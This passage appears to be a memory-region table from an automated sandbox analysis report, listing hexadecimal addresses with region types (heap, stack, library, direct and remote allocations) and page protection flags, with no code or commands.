25700000
|
trusted library allocation
|
page read and write
|
||
|
26330000
|
trusted library allocation
|
page read and write
|
||
|
727F000
|
stack
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
24C6FA01000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
23027000
|
stack
|
page read and write
|
||
|
2703000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
24C59044000
|
trusted library allocation
|
page read and write
|
||
|
2B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
|
24C55690000
|
heap
|
page read and write
|
||
|
24C55647000
|
heap
|
page read and write
|
||
|
25710000
|
trusted library allocation
|
page read and write
|
||
|
7907000
|
heap
|
page read and write
|
||
|
24C6F954000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
26310000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
22D1E000
|
stack
|
page read and write
|
||
|
7138000
|
trusted library allocation
|
page read and write
|
||
|
29B4000
|
heap
|
page read and write
|
||
|
68CE000
|
stack
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346FA000
|
trusted library allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
22228B20000
|
heap
|
page read and write
|
||
|
231E0000
|
trusted library allocation
|
page read and write
|
||
|
24C59554000
|
trusted library allocation
|
page read and write
|
||
|
8460000
|
direct allocation
|
page read and write
|
||
|
64CE000
|
stack
|
page read and write
|
||
|
22DDF000
|
stack
|
page read and write
|
||
|
24C5561C000
|
heap
|
page read and write
|
||
|
7150000
|
trusted library allocation
|
page read and write
|
||
|
231D6000
|
trusted library allocation
|
page read and write
|
||
|
24C57FA2000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
24C6F94C000
|
heap
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
83FE000
|
stack
|
page read and write
|
||
|
259AE000
|
stack
|
page read and write
|
||
|
8390000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DC0000
|
heap
|
page read and write
|
||
|
24C557D0000
|
heap
|
page read and write
|
||
|
6298BFE000
|
unkown
|
page read and write
|
||
|
24C57FBD000
|
trusted library allocation
|
page read and write
|
||
|
24C57255000
|
heap
|
page read and write
|
||
|
71B7000
|
trusted library allocation
|
page read and write
|
||
|
25740000
|
trusted library allocation
|
page read and write
|
||
|
24C57C02000
|
trusted library allocation
|
page read and write
|
||
|
7160000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C6F890000
|
heap
|
page execute and read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34542000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B48000
|
heap
|
page read and write
|
||
|
25230000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
271A000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34626000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
25609000
|
heap
|
page read and write
|
||
|
24C57C0D000
|
trusted library allocation
|
page read and write
|
||
|
7758000
|
heap
|
page read and write
|
||
|
AA44000
|
direct allocation
|
page execute and read and write
|
||
|
24C6F8E0000
|
heap
|
page read and write
|
||
|
2538000
|
stack
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
24C570FE000
|
heap
|
page read and write
|
||
|
6C20000
|
direct allocation
|
page read and write
|
||
|
22228AD0000
|
heap
|
page read and write
|
||
|
7E8E000
|
stack
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
260CC000
|
stack
|
page read and write
|
||
|
24C5765F000
|
heap
|
page read and write
|
||
|
254B0000
|
trusted library allocation
|
page read and write
|
||
|
4744000
|
remote allocation
|
page execute and read and write
|
||
|
293C000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
24C67781000
|
trusted library allocation
|
page read and write
|
||
|
23045000
|
trusted library allocation
|
page read and write
|
||
|
254B6000
|
trusted library allocation
|
page read and write
|
||
|
7750000
|
heap
|
page read and write
|
||
|
6A90000
|
direct allocation
|
page read and write
|
||
|
7FFD34544000
|
trusted library allocation
|
page read and write
|
||
|
252B0000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
2D5F000
|
unkown
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
24C558C0000
|
heap
|
page readonly
|
||
|
24C5559D000
|
heap
|
page read and write
|
||
|
26F4000
|
trusted library allocation
|
page read and write
|
||
|
22228D10000
|
heap
|
page read and write
|
||
|
78D0000
|
direct allocation
|
page read and write
|
||
|
2560C000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
2B10000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
7415E0E000
|
stack
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
7415038000
|
stack
|
page read and write
|
||
|
6B8A000
|
stack
|
page read and write
|
||
|
22228CF0000
|
heap
|
page read and write
|
||
|
7415E8D000
|
stack
|
page read and write
|
||
|
783D000
|
heap
|
page read and write
|
||
|
22C1F000
|
stack
|
page read and write
|
||
|
254A0000
|
heap
|
page execute and read and write
|
||
|
22228B2D000
|
heap
|
page read and write
|
||
|
24C6F9A0000
|
heap
|
page read and write
|
||
|
693E000
|
stack
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
25710000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
54A1000
|
trusted library allocation
|
page read and write
|
||
|
27B0000
|
heap
|
page read and write
|
||
|
2710000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
22EF0000
|
remote allocation
|
page read and write
|
||
|
780D000
|
heap
|
page read and write
|
||
|
7FFD345F6000
|
trusted library allocation
|
page read and write
|
||
|
24C6F9EB000
|
heap
|
page read and write
|
||
|
2A6E000
|
stack
|
page read and write
|
||
|
24C59584000
|
trusted library allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
26290000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A2F000
|
stack
|
page read and write
|
||
|
8B60000
|
direct allocation
|
page execute and read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
77B1000
|
heap
|
page read and write
|
||
|
230DF000
|
stack
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
29EC000
|
heap
|
page read and write
|
||
|
8100000
|
heap
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page read and write
|
||
|
24191000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
24C67790000
|
trusted library allocation
|
page read and write
|
||
|
24C57FF2000
|
trusted library allocation
|
page read and write
|
||
|
6A4D000
|
stack
|
page read and write
|
||
|
7FBA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
812D000
|
heap
|
page read and write
|
||
|
227D0000
|
direct allocation
|
page read and write
|
||
|
2311C000
|
stack
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
227E0000
|
direct allocation
|
page read and write
|
||
|
25198000
|
trusted library allocation
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
254D1000
|
trusted library allocation
|
page read and write
|
||
|
2610D000
|
stack
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
2526A000
|
stack
|
page read and write
|
||
|
22EF0000
|
remote allocation
|
page read and write
|
||
|
2618E000
|
stack
|
page read and write
|
||
|
256F0000
|
trusted library allocation
|
page read and write
|
||
|
2716000
|
trusted library allocation
|
page execute and read and write
|
||
|
44F8000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
7414C7E000
|
stack
|
page read and write
|
||
|
26310000
|
trusted library allocation
|
page read and write
|
||
|
2787000
|
heap
|
page read and write
|
||
|
6298AFD000
|
stack
|
page read and write
|
||
|
24C59047000
|
trusted library allocation
|
page read and write
|
||
|
6298CFF000
|
stack
|
page read and write
|
||
|
6544000
|
remote allocation
|
page execute and read and write
|
||
|
6AB0000
|
direct allocation
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
25710000
|
trusted library allocation
|
page execute and read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
24C57C11000
|
trusted library allocation
|
page read and write
|
||
|
78E0000
|
direct allocation
|
page read and write
|
||
|
25740000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
23187000
|
heap
|
page read and write
|
||
|
24C57E35000
|
trusted library allocation
|
page read and write
|
||
|
788D000
|
stack
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
24C57200000
|
trusted library allocation
|
page read and write
|
||
|
2B5A000
|
trusted library allocation
|
page execute and read and write
|
||
|
22FEC000
|
stack
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
4480000
|
heap
|
page read and write
|
||
|
24C59530000
|
trusted library allocation
|
page read and write
|
||
|
255F0000
|
heap
|
page read and write
|
||
|
24C6F8D0000
|
heap
|
page execute and read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
256F0000
|
trusted library allocation
|
page read and write
|
||
|
4430000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C58007000
|
trusted library allocation
|
page read and write
|
||
|
6B00000
|
direct allocation
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
256F0000
|
trusted library allocation
|
page read and write
|
||
|
7140000
|
heap
|
page execute and read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
437E000
|
stack
|
page read and write
|
||
|
2DEC000
|
heap
|
page read and write
|
||
|
256F0000
|
trusted library allocation
|
page read and write
|
||
|
27AD000
|
stack
|
page read and write
|
||
|
74150B8000
|
stack
|
page read and write
|
||
|
24C558D5000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
684E000
|
stack
|
page read and write
|
||
|
2B24000
|
trusted library allocation
|
page read and write
|
||
|
7414D3E000
|
stack
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
2316D000
|
stack
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
252C0000
|
trusted library allocation
|
page read and write
|
||
|
24C57C78000
|
trusted library allocation
|
page read and write
|
||
|
25609000
|
heap
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
25A51000
|
trusted library allocation
|
page read and write
|
||
|
254C2000
|
trusted library allocation
|
page read and write
|
||
|
252A9000
|
stack
|
page read and write
|
||
|
573A000
|
trusted library allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
68F5000
|
heap
|
page execute and read and write
|
||
|
24C57FB3000
|
trusted library allocation
|
page read and write
|
||
|
3C60000
|
remote allocation
|
page execute and read and write
|
||
|
45ED000
|
trusted library allocation
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
253AE000
|
stack
|
page read and write
|
||
|
24C57220000
|
heap
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
68F0000
|
heap
|
page execute and read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
7900000
|
heap
|
page read and write
|
||
|
26290000
|
trusted library allocation
|
page read and write
|
||
|
24C57C15000
|
trusted library allocation
|
page read and write
|
||
|
25B0000
|
heap
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
|
7F25000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
231C7000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
74152BE000
|
stack
|
page read and write
|
||
|
2FDF000
|
stack
|
page read and write
|
||
|
2B23000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
78CE000
|
stack
|
page read and write
|
||
|
24C59533000
|
trusted library allocation
|
page read and write
|
||
|
442C000
|
stack
|
page read and write
|
||
|
24C596D6000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
24C58A07000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
6BCE000
|
stack
|
page read and write
|
||
|
833E000
|
stack
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD3455B000
|
trusted library allocation
|
page read and write
|
||
|
2C2E000
|
unkown
|
page read and write
|
||
|
837C000
|
stack
|
page read and write
|
||
|
7720000
|
heap
|
page read and write
|
||
|
2B39000
|
trusted library allocation
|
page read and write
|
||
|
254DD000
|
trusted library allocation
|
page read and write
|
||
|
6AD0000
|
direct allocation
|
page read and write
|
||
|
7415D8F000
|
stack
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
8450000
|
direct allocation
|
page read and write
|
||
|
24C55880000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
2780000
|
heap
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
22810000
|
direct allocation
|
page read and write
|
||
|
2D9E000
|
stack
|
page read and write
|
||
|
24C58DCB000
|
trusted library allocation
|
page read and write
|
||
|
25490000
|
trusted library allocation
|
page read and write
|
||
|
252B0000
|
trusted library allocation
|
page read and write
|
||
|
22D50000
|
trusted library allocation
|
page read and write
|
||
|
5491000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
2596D000
|
stack
|
page read and write
|
||
|
23049000
|
trusted library allocation
|
page read and write
|
||
|
6C40000
|
direct allocation
|
page read and write
|
||
|
43C0000
|
heap
|
page readonly
|
||
|
780F000
|
heap
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page read and write
|
||
|
241B9000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
29CB000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7414E7E000
|
stack
|
page read and write
|
||
|
24FC000
|
stack
|
page read and write
|
||
|
7FFD345FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
26F0000
|
trusted library allocation
|
page read and write
|
||
|
2B50000
|
trusted library allocation
|
page read and write
|
||
|
4312000
|
trusted library allocation
|
page read and write
|
||
|
24C6F9D2000
|
heap
|
page read and write
|
||
|
2614C000
|
stack
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
4330000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
6C90000
|
heap
|
page read and write
|
||
|
80FE000
|
stack
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
23180000
|
heap
|
page read and write
|
||
|
22840000
|
direct allocation
|
page read and write
|
||
|
227F0000
|
direct allocation
|
page read and write
|
||
|
2930000
|
heap
|
page read and write
|
||
|
22C9F000
|
stack
|
page read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
|
2730000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C6F780000
|
heap
|
page read and write
|
||
|
25230000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
|
24C57DB5000
|
trusted library allocation
|
page read and write
|
||
|
24C6F9F2000
|
heap
|
page read and write
|
||
|
255F1000
|
heap
|
page read and write
|
||
|
843C000
|
stack
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page execute and read and write
|
||
|
23030000
|
trusted library allocation
|
page read and write
|
||
|
7DA0000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
241F4000
|
trusted library allocation
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
24C677A1000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
25730000
|
trusted library allocation
|
page read and write
|
||
|
253B0000
|
heap
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
22DF0000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
24C57250000
|
heap
|
page read and write
|
||
|
43D8000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
6F44000
|
remote allocation
|
page execute and read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
254BE000
|
trusted library allocation
|
page read and write
|
||
|
22EF0000
|
remote allocation
|
page read and write
|
||
|
256F8000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
784D000
|
heap
|
page read and write
|
||
|
24C5956B000
|
trusted library allocation
|
page read and write
|
||
|
24C570B0000
|
trusted library allocation
|
page read and write
|
||
|
4315000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C57EFD000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
78F0000
|
direct allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
28D0000
|
heap
|
page read and write
|
||
|
6C0C000
|
stack
|
page read and write
|
||
|
7E4D000
|
stack
|
page read and write
|
||
|
6F32000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
24C5568A000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
70F2000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
8173000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
254F1000
|
heap
|
page read and write
|
||
|
7F970000
|
trusted library allocation
|
page execute and read and write
|
||
|
7415F8B000
|
stack
|
page read and write
|
||
|
254CE000
|
trusted library allocation
|
page read and write
|
||
|
24C595C6000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
24C55770000
|
heap
|
page read and write
|
||
|
B444000
|
direct allocation
|
page execute and read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
27FD000
|
stack
|
page read and write
|
||
|
25700000
|
heap
|
page read and write
|
||
|
2900000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
4A05000
|
trusted library allocation
|
page read and write
|
||
|
259EE000
|
stack
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
|
227C0000
|
direct allocation
|
page read and write
|
||
|
2608E000
|
stack
|
page read and write
|
||
|
24C558B0000
|
trusted library allocation
|
page read and write
|
||
|
22228B10000
|
heap
|
page read and write
|
||
|
6C30000
|
direct allocation
|
page read and write
|
||
|
7DF435280000
|
trusted library allocation
|
page execute and read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
24C595C2000
|
trusted library allocation
|
page read and write
|
||
|
254BB000
|
trusted library allocation
|
page read and write
|
||
|
24C57FDD000
|
trusted library allocation
|
page read and write
|
||
|
25480000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
6B4D000
|
stack
|
page read and write
|
||
|
7D97000
|
stack
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
6EFE000
|
stack
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
231CF000
|
trusted library allocation
|
page read and write
|
||
|
252C0000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
2604C000
|
stack
|
page read and write
|
||
|
7180000
|
trusted library allocation
|
page read and write
|
||
|
25230000
|
trusted library allocation
|
page read and write
|
||
|
3D44000
|
remote allocation
|
page execute and read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
25FE000
|
stack
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
22228B27000
|
heap
|
page read and write
|
||
|
26320000
|
trusted library allocation
|
page read and write
|
||
|
25480000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
stack
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7414DFF000
|
stack
|
page read and write
|
||
|
6C10000
|
direct allocation
|
page read and write
|
||
|
7FFD34543000
|
trusted library allocation
|
page execute and read and write
|
||
|
54B9000
|
trusted library allocation
|
page read and write
|
||
|
2909000
|
heap
|
page read and write
|
||
|
6CA0000
|
heap
|
page read and write
|
||
|
24C57693000
|
heap
|
page read and write
|
||
|
254F0000
|
heap
|
page read and write
|
||
|
2562E000
|
heap
|
page read and write
|
||
|
256F0000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
25230000
|
trusted library allocation
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
8120000
|
heap
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34600000
|
trusted library allocation
|
page execute and read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
254D6000
|
trusted library allocation
|
page read and write
|
||
|
2786000
|
heap
|
page read and write
|
||
|
2B00000
|
trusted library section
|
page read and write
|
||
|
24C555A6000
|
heap
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
803C000
|
stack
|
page read and write
|
||
|
24C575E5000
|
heap
|
page read and write
|
||
|
69BF000
|
stack
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
74153BC000
|
stack
|
page read and write
|
||
|
253FD000
|
stack
|
page read and write
|
||
|
740B000
|
stack
|
page read and write
|
||
|
24C55643000
|
heap
|
page read and write
|
||
|
74148E5000
|
stack
|
page read and write
|
||
|
270D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
2965000
|
heap
|
page read and write
|
||
|
7841000
|
heap
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346F1000
|
trusted library allocation
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
43BE000
|
stack
|
page read and write
|
||
|
24C59558000
|
trusted library allocation
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
24C57C25000
|
trusted library allocation
|
page read and write
|
||
|
25A41000
|
trusted library allocation
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26330000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page read and write
|
||
|
22F2E000
|
stack
|
page read and write
|
||
|
24C597CC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
24C6F96E000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
8C44000
|
direct allocation
|
page execute and read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
256F0000
|
trusted library allocation
|
page read and write
|
||
|
24C557F0000
|
heap
|
page read and write
|
||
|
741533E000
|
stack
|
page read and write
|
||
|
24C55790000
|
heap
|
page read and write
|
||
|
741523E000
|
stack
|
page read and write
|
||
|
80BE000
|
stack
|
page read and write
|
||
|
7792000
|
heap
|
page read and write
|
||
|
24C575A0000
|
heap
|
page read and write
|
||
|
254CA000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
24C59545000
|
trusted library allocation
|
page read and write
|
||
|
24C5564D000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
4A07000
|
trusted library allocation
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
7414EFC000
|
stack
|
page read and write
|
||
|
2AF0000
|
trusted library section
|
page read and write
|
||
|
22228AE0000
|
heap
|
page read and write
|
||
|
24C57770000
|
heap
|
page execute and read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
22800000
|
direct allocation
|
page read and write
|
||
|
771D000
|
stack
|
page read and write
|
||
|
49F1000
|
trusted library allocation
|
page read and write
|
||
|
7020000
|
heap
|
page read and write
|
||
|
6AA0000
|
direct allocation
|
page read and write
|
||
|
24C59550000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
2722000
|
trusted library allocation
|
page read and write
|
||
|
252C5000
|
trusted library allocation
|
page read and write
|
||
|
6AF0000
|
direct allocation
|
page read and write
|
||
|
24C5906B000
|
trusted library allocation
|
page read and write
|
||
|
24C57C3A000
|
trusted library allocation
|
page read and write
|
||
|
26FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
2AAE000
|
stack
|
page read and write
|
||
|
24C558D0000
|
heap
|
page read and write
|
||
|
252B0000
|
trusted library allocation
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
22830000
|
direct allocation
|
page read and write
|
||
|
6AE0000
|
direct allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
23050000
|
heap
|
page read and write
|
||
|
8139000
|
heap
|
page read and write
|
||
|
2B20000
|
